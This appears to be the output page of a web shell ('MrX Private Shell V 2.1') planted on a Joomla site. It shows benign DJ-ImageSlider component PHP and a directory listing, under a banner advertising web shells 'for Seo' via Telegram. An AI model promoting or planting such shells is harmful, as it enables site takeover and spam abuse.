__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /** * @version $Id$ * @package DJ-ImageSlider * @subpackage DJ-ImageSlider Component * @copyright Copyright (C) 2017 DJ-Extensions.com, All rights reserved. * @license http://www.gnu.org/licenses GNU/GPL * @author url: http://dj-extensions.com * @author email [email protected] * @developer Szymon Woronowski - [email protected] * * * DJ-ImageSlider is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * DJ-ImageSlider is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with DJ-ImageSlider. If not, see <http://www.gnu.org/licenses/>. * */ // no direct access defined( '_JEXEC' ) or die( 'Restricted access' ); defined('DS') or define('DS', DIRECTORY_SEPARATOR); // Include dependancies jimport('joomla.application.component.controller'); $db = JFactory::getDBO(); $db->setQuery("SELECT manifest_cache FROM #__extensions WHERE element='com_djimageslider' LIMIT 1"); $version = json_decode($db->loadResult()); $version = $version->version; define('DJIMAGESLIDERFOOTER', '<div style="text-align: center; margin: 10px 0;">DJ-ImageSlider (version '.$version.'), © 2010-'.JFactory::getDate()->format('Y').' Copyright by <a target="_blank" href="http://dj-extensions.com">DJ-Extensions.com</a>, All Rights Reserved.<br /><a target="_blank" href="http://dj-extensions.com"><img src="'.JURI::base().'components/com_djimageslider/assets/logo.png" alt="DJ-Extensions.com" style="margin: 20px 0 0;" /></a></div>'); $document = JFactory::getDocument(); if ($document->getType() == 'html') { $document->addStyleSheet(JURI::base(true).'/components/com_djimageslider/assets/admin.css'); } $controller = JControllerLegacy::getInstance('djimageslider'); // Perform the Request task $controller->execute( JFactory::getApplication()->input->get('task') ); $controller->redirect(); ?>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| assets | Folder | 0775 |
|
|
| controllers | Folder | 0775 |
|
|
| helpers | Folder | 0775 |
|
|
| language | Folder | 0775 |
|
|
| models | Folder | 0775 |
|
|
| sql | Folder | 0775 |
|
|
| tables | Folder | 0775 |
|
|
| views | Folder | 0775 |
|
|
| access.xml | File | 1.27 KB | 0664 |
|
| config.xml | File | 557 B | 0664 |
|
| controller.php | File | 1.5 KB | 0664 |
|
| djimageslider.php | File | 2.26 KB | 0664 |
|
| djimageslider.xml | File | 1.64 KB | 0664 |
|
| index.html | File | 0 B | 0664 |
|